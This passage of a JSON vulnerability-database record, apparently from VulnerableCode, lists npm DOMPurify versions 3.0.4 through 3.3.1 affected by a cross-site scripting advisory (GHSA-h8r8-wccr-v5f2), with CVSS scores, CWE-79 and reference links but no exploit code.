"purl": "pkg:npm/dompurify@3.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/708328?format=api", "purl": "pkg:npm/dompurify@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/708329?format=api", "purl": "pkg:npm/dompurify@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/708330?format=api", "purl": "pkg:npm/dompurify@3.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/708331?format=api", "purl": "pkg:npm/dompurify@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/708332?format=api", "purl": "pkg:npm/dompurify@3.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/708333?format=api", "purl": "pkg:npm/dompurify@3.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/708334?format=api", "purl": "pkg:npm/dompurify@3.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/708335?format=api", "purl": "pkg:npm/dompurify@3.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/708336?format=api", "purl": "pkg:npm/dompurify@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/708337?format=api", "purl": "pkg:npm/dompurify@3.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/42061?format=api", "purl": "pkg:npm/dompurify@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/748269?format=api", "purl": "pkg:npm/dompurify@3.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/748270?format=api", "purl": "pkg:npm/dompurify@3.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/748271?format=api", "purl": "pkg:npm/dompurify@3.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/748272?format=api", "purl": "pkg:npm/dompurify@3.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/748273?format=api", "purl": "pkg:npm/dompurify@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/748274?format=api", "purl": "pkg:npm/dompurify@3.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/748275?format=api", "purl": "pkg:npm/dompurify@3.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/748276?format=api", "purl": "pkg:npm/dompurify@3.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/69510?format=api", "purl": "pkg:npm/dompurify@3.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/999529?format=api", "purl": "pkg:npm/dompurify@3.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/999530?format=api", "purl": "pkg:npm/dompurify@3.2.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-mv6v-re2k-g3gn" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/67437?format=api", "purl": "pkg:npm/dompurify@3.2.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/999531?format=api", "purl": "pkg:npm/dompurify@3.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/147436?format=api", "purl": "pkg:npm/dompurify@3.3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-ps3s-bymy-dkbc" }, { "vulnerability": "VCID-ter4-v1bu-7fan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.1" } ], "references": [ { "reference_url": "https://github.com/cure53/DOMPurify", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.3.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.3.2" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2" }, { "reference_url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "GHSA-h8r8-wccr-v5f2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2" } ], "weaknesses": [ { "cwe_id": 79, "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "description": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "4.0 - 6.9", "exploitability": "0.5", "weighted_severity": "6.2", "risk_score": 3.1, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ter4-v1bu-7fan" }